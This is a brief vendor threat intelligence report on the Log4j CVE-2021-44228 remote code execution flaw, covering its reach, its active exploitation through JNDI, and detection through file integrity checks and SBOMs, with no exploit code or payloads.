THREAT INTELLIGENCE REPORT
Log4j Java Logging
Critical Vulnerability Results in
Remote Code Execution (RCE)
Fortress Information Security is working closely with government and commercial clients to assist in mitigation efforts of the recent CVE-2021-44228 vulnerability for the popular Java logging library, Log4j. So far we have identified over 250,000 open source projects that reference Log4j.
Log4j is developed by the Apache Foundation and used in thousands of applications including the Apache Struts code and impacts Cloudflare, Minecraft, Twitter, Apple, and many of the largest tech companies in the world. This vulnerability, and corresponding public exploits, are being actively exploited in the wild by abusing the Java Naming and Directory Interface (JNDI), a Java API used by the Java programming language.
This is a critical vulnerability which results in Remote Code Execution (RCE). Fortress has validated the Log4j vulnerability is easily identified via automated methods within a File Integrity Assurance (FIA) solution. Software Bills of Materials (SBOMs) are an effective means of determining when components are impacted by newly discovered vulnerabilities. Below is an example SBOM highlighting the affected version of Log4j in Keycloak, an open-source identity and access management solution.